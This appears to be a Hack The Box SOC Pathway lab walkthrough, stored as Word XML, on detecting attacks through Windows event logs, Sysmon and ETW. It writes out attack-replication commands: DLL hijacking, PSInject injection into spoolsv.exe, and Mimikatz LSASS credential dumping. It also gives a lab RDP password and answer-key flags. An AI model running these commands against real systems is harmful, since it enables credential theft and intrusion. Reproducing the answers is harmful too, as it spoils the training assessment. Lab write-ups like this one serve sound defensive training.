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HTB – Windows Event Logs (SOC Pathway) Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This walkthrough covers multiple detection and attack replication scenarios using Windows Event Logs, Sysmon, ETW, and common offensive tools such as reflective DLL injection, PSInject, and Mimikatz. The exercises are part of the Hack The Box SOC Pathway and focus on analyzing malicious activity through logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. DLL Hijacking Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Goal: Replicate a DLL hijacking attack and retrieve the SHA256 hash of the malicious WININET.dll.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>51f2305dcf385056c68f7ccf5b1b3b9304865cef1257947d4ad6ef5fad2e3b13</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Connect via RDP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>xfreerdp /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /v:[Target-IP] /dynamic-resolution</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>2. Navigate to tools directory:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>cd "C:\Tools\Reflective DLLInjection"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>3. Identify system architecture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>4. Rename malicious DLL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ren "reflective_dll.x64.dll" WININET.dll</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>5. Copy files to Desktop:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>copy C:\Windows\System32\calc.exe C:\Users\Administrator\Desktop\calc.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>copy WININET.dll C:\Users\Administrator\Desktop\WININET.dll</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>6. Execute calc.exe to trigger DLL hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>7. Retrieve the hash:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CertUtil -hashfile C:\Users\Administrator\Desktop\WININET.dll SHA256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Get-FileHash C:\Users\Administrator\Desktop\WININET.dll -Algorithm SHA256</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[ Screenshot Placeholder: DLL Hijacking popup ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Unmanaged PowerShell Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Goal: Inject unmanaged PowerShell code into spoolsv.exe and retrieve the SHA256 hash of clrjit.dll.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>8A3CD3CF2249E9971806B15C75A892E6A44CCA5FF5EA5CA89FDA951CD2C09AA9</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Start PowerShell with bypass:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>2. Import PSInject module:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Import-Module C:\Tools\PSInject\Invoke-PSInject.ps1</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>3. Identify spoolsv PID:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Get-Process spoolsv</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>4. Inject PowerShell code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Invoke-PSInject -ProcId [PID] -PoshCode "V3JpdGUtSG9zdCAiSGVsbG8sIEd1cnU5OSEi"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>5. Verify using Process Hacker (check loaded modules).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>6. Retrieve hash of clrjit.dll:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Get-FileHash "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll" -Algorithm SHA256</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[ Screenshot Placeholder: Process Hacker showing clrjit.dll ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Credential Dumping with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Goal: Dump credentials from LSASS and retrieve the NTLM hash for Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5e4ffd54b3849aa720ed39f50185e533</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Navigate to directory:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>cd C:\Tools\Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>2. Run mimikatz executable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>AgentEXE.exe</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>3. Enable debug privileges:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>4. Dump credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>5. Locate Administrator NTLM hash in output.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[ Screenshot Placeholder: Mimikatz credential dump ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. ETW Monitoring with SilkETW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Goal: Capture ETW events while running Seatbelt and identify the ManagedInteropMethodName.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>GetTokenInformation</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Run SilkETW:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>C:\Tools\SilkETW_SilkService_v8\v8\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -ot file -p</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>2. Run Seatbelt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>.\Seatbelt.exe TokenPrivileges</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>3. Review ETW logs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>C:\Windows\Temp\etw.json</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>4. Search for method starting with G and ending with ion.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[ Screenshot Placeholder: ETW log output ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Parsing EVTX Logs with Get-WinEvent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Goal: Determine when the \\*\PRINT share was added.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>12:30:30</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>PowerShell Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Get-ChildItem "C:\Tools\chainsaw\EVTX-ATTACK-SAMPLES\Lateral Movement" -Filter *.evtx |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">  Get-WinEvent -Path $_.FullName -ErrorAction SilentlyContinue |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">  Where-Object { $_.Message -like "*share*" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Review event timestamps and identify the correct time.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[ Screenshot Placeholder: PowerShell output showing timestamp ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Skills Assessment Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Process executing DLL hijack: Dism.exe</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Process executing unmanaged PowerShell: Calculator.exe</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Process performing injection: rundll32.exe</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Process performing LSASS dump: processhacker.exe</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ill-intended login after dump: No</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Strange parent-child execution process: WerFault.exe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